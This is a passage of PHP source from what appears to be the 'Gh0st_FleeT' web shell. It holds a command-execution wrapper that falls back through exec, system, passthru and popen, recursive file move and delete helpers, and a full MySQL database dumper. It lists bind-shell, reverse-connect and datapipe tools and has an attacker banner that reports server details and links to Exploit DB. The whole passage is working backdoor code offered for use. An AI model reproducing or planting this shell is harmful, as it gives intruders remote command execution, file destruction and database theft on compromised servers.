  710.  
  711.  }
  712.  
  713. }
  714.  
  715. }
  716.  
  717. if (!function_exists("fs_copy_dir"))
  718.  
  719. {
  720.  
  721. function fs_copy_dir($d,$t)
  722.  
  723. {
  724.  
  725.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  726.  
  727.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  728.  
  729.  $h = opendir($d);
  730.  
  731.  while (($o = readdir($h)) !== FALSE)
  732.  
  733.  {
  734.  
  735.   if (($o != ".") and ($o != ".."))
  736.  
  737.   {
  738.  
  739.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  740.  
  741.    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  742.  
  743.    if (!$ret) {return $ret;}
  744.  
  745.   }
  746.  
  747.  }
  748.  
  749.  closedir($h);
  750.  
  751.  return TRUE;
  752.  
  753. }
  754.  
  755. }
  756.  
  757. if (!function_exists("fs_copy_obj"))
  758.  
  759. {
  760.  
  761. function fs_copy_obj($d,$t)
  762.  
  763. {
  764.  
  765.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  766.  
  767.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  768.  
  769.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  770.  
  771.  if (is_dir($d))
  772.  
  773.  {
  774.  
  775.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  776.  
  777.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  778.  
  779.   return fs_copy_dir($d,$t);
  780.  
  781.  }
  782.  
  783.  elseif (is_file($d)) {return copy($d,$t);}
  784.  
  785.  else {return FALSE;}
  786.  
  787. }
  788.  
  789. }
  790.  
  791. if (!function_exists("fs_move_dir"))
  792.  
  793. {
  794.  
  795. function fs_move_dir($d,$t)
  796.  
  797. {
  798.  
  799.  $h = opendir($d);
  800.  
  801.  if (!is_dir($t)) {mkdir($t);}
  802.  
  803.  while (($o = readdir($h)) !== FALSE)
  804.  
  805.  {
  806.  
  807.   if (($o != ".") and ($o != ".."))
  808.  
  809.   {
  810.  
  811.    $ret = TRUE;
  812.  
  813.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  814.  
  815.    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  816.  
  817.    if (!$ret) {return $ret;}
  818.  
  819.   }
  820.  
  821.  }
  822.  
  823.  closedir($h);
  824.  
  825.  return TRUE;
  826.  
  827. }
  828.  
  829. }
  830.  
  831. if (!function_exists("fs_move_obj"))
  832.  
  833. {
  834.  
  835. function fs_move_obj($d,$t)
  836.  
  837. {
  838.  
  839.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  840.  
  841.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  842.  
  843.  if (is_dir($d))
  844.  
  845.  {
  846.  
  847.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  848.  
  849.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  850.  
  851.   return fs_move_dir($d,$t);
  852.  
  853.  }
  854.  
  855.  elseif (is_file($d))
  856.  
  857.  {
  858.  
  859.   if(copy($d,$t)) {return unlink($d);}
  860.  
  861.   else {unlink($t); return FALSE;}
  862.  
  863.  }
  864.  
  865.  else {return FALSE;}
  866.  
  867. }
  868.  
  869. }
  870.  
  871. if (!function_exists("fs_rmdir"))
  872.  
  873. {
  874.  
  875. function fs_rmdir($d)
  876.  
  877. {
  878.  
  879.  $h = opendir($d);
  880.  
  881.  while (($o = readdir($h)) !== FALSE)
  882.  
  883.  {
  884.  
  885.   if (($o != ".") and ($o != ".."))
  886.  
  887.   {
  888.  
  889.    if (!is_dir($d.$o)) {unlink($d.$o);}
  890.  
  891.    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  892.  
  893.   }
  894.  
  895.  }
  896.  
  897.  closedir($h);
  898.  
  899.  rmdir($d);
  900.  
  901.  return !is_dir($d);
  902.  
  903. }
  904.  
  905. }
  906.  
  907. if (!function_exists("fs_rmobj"))
  908.  
  909. {
  910.  
  911. function fs_rmobj($o)
  912.  
  913. {
  914.  
  915.  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  916.  
  917.  if (is_dir($o))
  918.  
  919.  {
  920.  
  921.   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  922.  
  923.   return fs_rmdir($o);
  924.  
  925.  }
  926.  
  927.  elseif (is_file($o)) {return unlink($o);}
  928.  
  929.  else {return FALSE;}
  930.  
  931. }
  932.  
  933. }
  934.  
  935. if (!function_exists("myshellexec"))
  936.  
  937. {
  938.  
  939. function myshellexec($cmd)
  940.  
  941. {
  942.  
  943.  global $disablefunc;
  944.  
  945.  $result = "";
  946.  
  947.  if (!empty($cmd))
  948.  
  949.  {
  950.  
  951.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  952.  
  953.   elseif (($result = `$cmd`) !== FALSE) {}
  954.  
  955.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  956.  
  957.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  958.  
  959.   elseif (is_resource($fp = popen($cmd,"r")))
  960.  
  961.   {
  962.  
  963.    $result = "";
  964.  
  965.    while(!feof($fp)) {$result .= fread($fp,1024);}
  966.  
  967.    pclose($fp);
  968.  
  969.   }
  970.  
  971.  }
  972.  
  973.  return $result;
  974.  
  975. }
  976.  
  977. }
  978.  
  979. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  980.  
  981. if (!function_exists("view_perms"))
  982.  
  983. {
  984.  
  985. function view_perms($mode)
  986.  
  987. {
  988.  
  989.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  990.  
  991.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  992.  
  993.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  994.  
  995.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  996.  
  997.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  998.  
  999.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  1000.  
  1001.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  1002.  
  1003.  else {$type = "?";}
  1004.  
  1005.  
  1006.  
  1007.  $owner["read"] = ($mode & 00400)?"r":"-";
  1008.  
  1009.  $owner["write"] = ($mode & 00200)?"w":"-";
  1010.  
  1011.  $owner["execute"] = ($mode & 00100)?"x":"-";
  1012.  
  1013.  $group["read"] = ($mode & 00040)?"r":"-";
  1014.  
  1015.  $group["write"] = ($mode & 00020)?"w":"-";
  1016.  
  1017.  $group["execute"] = ($mode & 00010)?"x":"-";
  1018.  
  1019.  $world["read"] = ($mode & 00004)?"r":"-";
  1020.  
  1021.  $world["write"] = ($mode & 00002)? "w":"-";
  1022.  
  1023.  $world["execute"] = ($mode & 00001)?"x":"-";
  1024.  
  1025.  
  1026.  
  1027.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  1028.  
  1029.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  1030.  
  1031.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  1032.  
  1033.  
  1034.  
  1035.  return $type.join("",$owner).join("",$group).join("",$world);
  1036.  
  1037. }
  1038.  
  1039. }
  1040.  
  1041. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  1042.  
  1043. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  1044.  
  1045. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  1046.  
  1047. if (!function_exists("parse_perms"))
  1048.  
  1049. {
  1050.  
  1051. function parse_perms($mode)
  1052.  
  1053. {
  1054.  
  1055.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  1056.  
  1057.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  1058.  
  1059.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  1060.  
  1061.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  1062.  
  1063.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  1064.  
  1065.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  1066.  
  1067.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  1068.  
  1069.  else {$t = "?";}
  1070.  
  1071.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  1072.  
  1073.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  1074.  
  1075.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  1076.  
  1077.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  1078.  
  1079. }
  1080.  
  1081. }
  1082.  
  1083. if (!function_exists("parsesort"))
  1084.  
  1085. {
  1086.  
  1087. function parsesort($sort)
  1088.  
  1089. {
  1090.  
  1091.  $one = intval($sort);
  1092.  
  1093.  $second = substr($sort,-1);
  1094.  
  1095.  if ($second != "d") {$second = "a";}
  1096.  
  1097.  return array($one,$second);
  1098.  
  1099. }
  1100.  
  1101. }
  1102.  
  1103. if (!function_exists("view_perms_color"))
  1104.  
  1105. {
  1106.  
  1107. function view_perms_color($o)
  1108.  
  1109. {
  1110.  
  1111.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  1112.  
  1113.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  1114.  
  1115.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  1116.  
  1117. }
  1118.  
  1119. }
  1120.  
  1121. if (!function_exists("ghost_source"))
  1122.  
  1123. {
  1124.  
  1125. function ghost_source($fn)
  1126.  
  1127. {
  1128.  
  1129.  global $gh0st_sourcesurl;
  1130.  
  1131.  $array = array(
  1132.  
  1133.   "Gh0st_bindport.pl" => "Gh0st_bindport_pl.txt",
  1134.  
  1135.   "Gh0st_bindport.c" => "Gh0st_bindport_c.txt",
  1136.  
  1137.   "Gh0st_backconn.pl" => "Gh0st_backconn_pl.txt",
  1138.  
  1139.   "Gh0st_backconn.c" => "Gh0st_backconn_c.txt",
  1140.  
  1141.   "Gh0st_datapipe.pl" => "Gh0st_datapipe_pl.txt",
  1142.  
  1143.   "Gh0st_datapipe.c" => "Gh0st_datapipe_c.txt",
  1144.  
  1145.  );
  1146.  
  1147. }
  1148.  
  1149. }
  1150.  
  1151. if (!function_exists("mysql_dump"))
  1152.  
  1153. {
  1154.  
  1155. function mysql_dump($set)
  1156.  
  1157. {
  1158.  
  1159.  global $shver;
  1160.  
  1161.  $sock = $set["sock"];
  1162.  
  1163.  $db = $set["db"];
  1164.  
  1165.  $print = $set["print"];
  1166.  
  1167.  $nl2br = $set["nl2br"];
  1168.  
  1169.  $file = $set["file"];
  1170.  
  1171.  $add_drop = $set["add_drop"];
  1172.  
  1173.  $tabs = $set["tabs"];
  1174.  
  1175.  $onlytabs = $set["onlytabs"];
  1176.  
  1177.  $ret = array();
  1178.  
  1179.  $ret["err"] = array();
  1180.  
  1181.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  1182.  
  1183.  if (empty($db)) {$db = "db";}
  1184.  
  1185.  if (empty($print)) {$print = 0;}
  1186.  
  1187.  if (empty($nl2br)) {$nl2br = 0;}
  1188.  
  1189.  if (empty($add_drop)) {$add_drop = TRUE;}
  1190.  
  1191.  if (empty($file))
  1192.  
  1193.  {
  1194.  
  1195.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  1196.  
  1197.  }
  1198.  
  1199.  if (!is_array($tabs)) {$tabs = array();}
  1200.  
  1201.  if (empty($add_drop)) {$add_drop = TRUE;}
  1202.  
  1203.  if (sizeof($tabs) == 0)
  1204.  
  1205.  {
  1206.  
  1207.   // retrive tables-list
  1208.  
  1209.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  1210.  
  1211.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  1212.  
  1213.  }
  1214.  
  1215.  $out = "# Dumped by Gh0st.SQL v. ".$shver."
  1216.  
  1217. # Home page: http://ghostfleet.in
  1218.  
  1219. #
  1220.  
  1221. # Host settings:
  1222.  
  1223. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  1224.  
  1225. # Date: ".date("d.m.Y H:i:s")."
  1226.  
  1227. # DB: \"".$db."\"
  1228.  
  1229. #---------------------------------------------------------
  1230.  
  1231. ";
  1232.  
  1233.  $c = count($onlytabs);
  1234.  
  1235.  foreach($tabs as $tab)
  1236.  
  1237.  {
  1238.  
  1239.   if ((in_array($tab,$onlytabs)) or (!$c))
  1240.  
  1241.   {
  1242.  
  1243.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  1244.  
  1245.    // recieve query for create table structure
  1246.  
  1247.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  1248.  
  1249.    if (!$res) {$ret["err"][] = mysql_smarterror();}
  1250.  
  1251.    else
  1252.  
  1253.    {
  1254.  
  1255.     $row = mysql_fetch_row($res);
  1256.  
  1257.     $out .= $row["1"].";\n\n";
  1258.  
  1259.     // recieve table variables
  1260.  
  1261.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  1262.  
  1263.     if (mysql_num_rows($res) > 0)
  1264.  
  1265.     {
  1266.  
  1267.      while ($row = mysql_fetch_assoc($res))
  1268.  
  1269.      {
  1270.  
  1271.       $keys = implode("`, `", array_keys($row));
  1272.  
  1273.       $values = array_values($row);
  1274.  
  1275.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  1276.  
  1277.       $values = implode("', '", $values);
  1278.  
  1279.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  1280.  
  1281.       $out .= $sql;
  1282.  
  1283.      }
  1284.  
  1285.     }
  1286.  
  1287.    }
  1288.  
  1289.   }
  1290.  
  1291.  }
  1292.  
  1293.  $out .= "#---------------------------------------------------------------------------------\n\n";
  1294.  
  1295.  if ($file)
  1296.  
  1297.  {
  1298.  
  1299.   $fp = fopen($file, "w");
  1300.  
  1301.   if (!$fp) {$ret["err"][] = 2;}
  1302.  
  1303.   else
  1304.  
  1305.   {
  1306.  
  1307.    fwrite ($fp, $out);
  1308.  
  1309.    fclose ($fp);
  1310.  
  1311.   }
  1312.  
  1313.  }
  1314.  
  1315.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  1316.  
  1317.  return $out;
  1318.  
  1319. }
  1320.  
  1321. }
  1322.  
  1323. if (!function_exists("mysql_buildwhere"))
  1324.  
  1325. {
  1326.  
  1327. function mysql_buildwhere($array,$sep=" and",$functs=array())
  1328.  
  1329. {
  1330.  
  1331.  if (!is_array($array)) {$array = array();}
  1332.  
  1333.  $result = "";
  1334.  
  1335.  foreach($array as $k=>$v)
  1336.  
  1337.  {
  1338.  
  1339.   $value = "";
  1340.  
  1341.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  1342.  
  1343.   $value .= "'".addslashes($v)."'";
  1344.  
  1345.   if (!empty($functs[$k])) {$value .= ")";}
  1346.  
  1347.   $result .= "`".$k."` = ".$value.$sep;
  1348.  
  1349.  }
  1350.  
  1351.  $result = substr($result,0,strlen($result)-strlen($sep));
  1352.  
  1353.  return $result;
  1354.  
  1355. }
  1356.  
  1357. }
  1358.  
  1359. if (!function_exists("mysql_fetch_all"))
  1360.  
  1361. {
  1362.  
  1363. function mysql_fetch_all($query,$sock)
  1364.  
  1365. {
  1366.  
  1367.  if ($sock) {$result = mysql_query($query,$sock);}
  1368.  
  1369.  else {$result = mysql_query($query);}
  1370.  
  1371.  $array = array();
  1372.  
  1373.  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  1374.  
  1375.  mysql_free_result($result);
  1376.  
  1377.  return $array;
  1378.  
  1379. }
  1380.  
  1381. }
  1382.  
  1383. if (!function_exists("mysql_smarterror"))
  1384.  
  1385. {
  1386.  
  1387. function mysql_smarterror($type,$sock)
  1388.  
  1389. {
  1390.  
  1391.  if ($sock) {$error = mysql_error($sock);}
  1392.  
  1393.  else {$error = mysql_error();}
  1394.  
  1395.  $error = htmlspecialchars($error);
  1396.  
  1397.  return $error;
  1398.  
  1399. }
  1400.  
  1401. }
  1402.  
  1403. if (!function_exists("mysql_query_form"))
  1404.  
  1405. {
  1406.  
  1407. function mysql_query_form()
  1408.  
  1409. {
  1410.  
  1411.  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  1412.  
  1413.  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1414.  
  1415.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1416.  
  1417.  if ((!$submit) or ($sql_act))
  1418.  
  1419.  {
  1420.  
  1421.   echo "<table border=0><tr><td><form name=\"Gh0st_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  1422.  
  1423.   if ($tbl_struct)
  1424.  
  1425.   {
  1426.  
  1427.    echo "<td valign=\"top\"><b>Fields:</b><br>";
  1428.  
  1429.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.Gh0st_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  1430.  
  1431.    echo "</td></tr></table>";
  1432.  
  1433.   }
  1434.  
  1435.  }
  1436.  
  1437.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  1438.  
  1439. }
  1440.  
  1441. }
  1442.  
  1443. if (!function_exists("mysql_create_db"))
  1444.  
  1445. {
  1446.  
  1447. function mysql_create_db($db,$sock="")
  1448.  
  1449. {
  1450.  
  1451.  $sql = "CREATE DATABASE `".addslashes($db)."`;";
  1452.  
  1453.  if ($sock) {return mysql_query($sql,$sock);}
  1454.  
  1455.  else {return mysql_query($sql);}
  1456.  
  1457. }
  1458.  
  1459. }
  1460.  
  1461. if (!function_exists("mysql_query_parse"))
  1462.  
  1463. {
  1464.  
  1465. function mysql_query_parse($query)
  1466.  
  1467. {
  1468.  
  1469.  $query = trim($query);
  1470.  
  1471.  $arr = explode (" ",$query);
  1472.  
  1473.  /*array array()
  1474.  
  1475.  {
  1476.  
  1477.   "METHOD"=>array(output_type),
  1478.  
  1479.   "METHOD1"...
  1480.  
  1481.   ...
  1482.  
  1483.  }
  1484.  
  1485.  if output_type == 0, no output,
  1486.  
  1487.  if output_type == 1, no output if no error
  1488.  
  1489.  if output_type == 2, output without control-buttons
  1490.  
  1491.  if output_type == 3, output with control-buttons
  1492.  
  1493.  */
  1494.  
  1495.  $types = array(
  1496.  
  1497.   "SELECT"=>array(3,1),
  1498.  
  1499.   "SHOW"=>array(2,1),
  1500.  
  1501.   "DELETE"=>array(1),
  1502.  
  1503.   "DROP"=>array(1)
  1504.  
  1505.  );
  1506.  
  1507.  $result = array();
  1508.  
  1509.  $op = strtoupper($arr[0]);
  1510.  
  1511.  if (is_array($types[$op]))
  1512.  
  1513.  {
  1514.  
  1515.   $result["propertions"] = $types[$op];
  1516.  
  1517.   $result["query"]  = $query;
  1518.  
  1519.   if ($types[$op] == 2)
  1520.  
  1521.   {
  1522.  
  1523.    foreach($arr as $k=>$v)
  1524.  
  1525.    {
  1526.  
  1527.     if (strtoupper($v) == "LIMIT")
  1528.  
  1529.     {
  1530.  
  1531.      $result["limit"] = $arr[$k+1];
  1532.  
  1533.      $result["limit"] = explode(",",$result["limit"]);
  1534.  
  1535.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  1536.  
  1537.      unset($arr[$k],$arr[$k+1]);
  1538.  
  1539.     }
  1540.  
  1541.    }
  1542.  
  1543.   }
  1544.  
  1545.  }
  1546.  
  1547.  else {return FALSE;}
  1548.  
  1549. }
  1550.  
  1551. }
  1552.  
  1553. if (!function_exists("ghostsearch"))
  1554.  
  1555. {
  1556.  
  1557. function ghostsearch($d)
  1558.  
  1559. {
  1560.  
  1561.  global $found;
  1562.  
  1563.  global $found_d;
  1564.  
  1565.  global $found_f;
  1566.  
  1567.  global $search_i_f;
  1568.  
  1569.  global $search_i_d;
  1570.  
  1571.  global $a;
  1572.  
  1573.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1574.  
  1575.  $h = opendir($d);
  1576.  
  1577.  while (($f = readdir($h)) !== FALSE)
  1578.  
  1579.  {
  1580.  
  1581.   if($f != "." && $f != "..")
  1582.  
  1583.   {
  1584.  
  1585.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  1586.  
  1587.    if (is_dir($d.$f))
  1588.  
  1589.    {
  1590.  
  1591.     $search_i_d++;
  1592.  
  1593.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  1594.  
  1595.     if (!is_link($d.$f)) {ghostsearch($d.$f);}
  1596.  
  1597.    }
  1598.  
  1599.    else
  1600.  
  1601.    {
  1602.  
  1603.     $search_i_f++;
  1604.  
  1605.     if ($bool)
  1606.  
  1607.     {
  1608.  
  1609.      if (!empty($a["text"]))
  1610.  
  1611.      {
  1612.  
  1613.       $r = @file_get_contents($d.$f);
  1614.  
  1615.       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  1616.  
  1617.       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  1618.  
  1619.       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  1620.  
  1621.       else {$bool = strpos(" ".$r,$a["text"],1);}
  1622.  
  1623.       if ($a["text_not"]) {$bool = !$bool;}
  1624.  
  1625.       if ($bool) {$found[] = $d.$f; $found_f++;}
  1626.  
  1627.      }
  1628.  
  1629.      else {$found[] = $d.$f; $found_f++;}
  1630.  
  1631.     }
  1632.  
  1633.    }
  1634.  
  1635.   }
  1636.  
  1637.  }
  1638.  
  1639.  closedir($h);
  1640.  
  1641. }
  1642.  
  1643. }
  1644.  
  1645. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  1646.  
  1647. //Sending headers
  1648.  
  1649. @ob_start();
  1650.  
  1651. @ob_implicit_flush(0);
  1652.  
  1653. function onphpshutdown()
  1654.  
  1655. {
  1656.  
  1657.  global $gzipencode,$ft;
  1658.  
  1659.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  1660.  
  1661.  {
  1662.  
  1663.   $v = @ob_get_contents();
  1664.  
  1665.   @ob_end_clean();
  1666.  
  1667.   @ob_start("ob_gzHandler");
  1668.  
  1669.   echo $v;
  1670.  
  1671.   @ob_end_flush();
  1672.  
  1673.  }
  1674.  
  1675. }
  1676.  
  1677. function ghostext()
  1678.  
  1679. {
  1680.  
  1681.  onphpshutdown();
  1682.  
  1683.  exit;
  1684.  
  1685. }
  1686.  
  1687.  
  1688. if (empty($tmpdir))
  1689.  
  1690. {
  1691.  
  1692.  $tmpdir = ini_get("upload_tmp_dir");
  1693.  
  1694.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  1695.  
  1696. }
  1697.  
  1698. $tmpdir = realpath($tmpdir);
  1699.  
  1700. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  1701.  
  1702. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  1703.  
  1704. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  1705.  
  1706. else {$tmpdir_logs = realpath($tmpdir_logs);}
  1707.  
  1708. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  1709.  
  1710. {
  1711.  
  1712.  $safemode = TRUE;
  1713.  
  1714.  $hsafemode = "<font color=green>ON (secure)</font>";
  1715.   $sfmode = "<font color=green><b>ON (secure)</b></font>";
  1716. }
  1717.  
  1718. else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}
  1719.  
  1720. $v = @ini_get("open_basedir");
  1721.  
  1722. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  1723.  
  1724. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  1725.  
  1726. $sort = htmlspecialchars($sort);
  1727.  
  1728. if (empty($sort)) {$sort = $sort_default;}
  1729.  
  1730. $sort[1] = strtolower($sort[1]);
  1731.  
  1732. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  1733.  
  1734. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  1735.  
  1736. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));
  1737.  
  1738. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  1739.  
  1740. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  1741.  
  1742. @ini_set("highlight.default",$highlight_default); //#0000BB
  1743.  
  1744. @ini_set("highlight.html",$highlight_html); //#000000
  1745.  
  1746. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  1747.  
  1748. @ini_set("highlight.string",$highlight_string); //#DD0000
  1749.  
  1750. if (!is_array($actbox)) {$actbox = array();}
  1751.  
  1752. $dspact = $act = htmlspecialchars($act);
  1753.  
  1754. $disp_fullpath = $ls_arr = $notls = null;
  1755.  
  1756. $ud = urlencode($d);
  1757.  
  1758. ?>
  1759.  
  1760. <center>
  1761. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  1762. <tr>
  1763. <td><center><p><a href="?"><img src="http://------.png" height="68px" width="66px" border="0px"/></a><br />Gh0st_FleeT<br /><?php echo $shver; ?> </p></center></td>
  1764. <td width="90%">
  1765. <TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>
  1766.  <tr>
  1767.     <td width="9%" ><b>Software :</b></td>
  1768.     <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>
  1769.     <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>
  1770.     <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>
  1771.  </tr>
  1772.  <tr>
  1773.     <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>
  1774.     <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>
  1775.     <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>
  1776.     <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>
  1777.  </tr>
  1778.  <tr>
  1779.     <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>
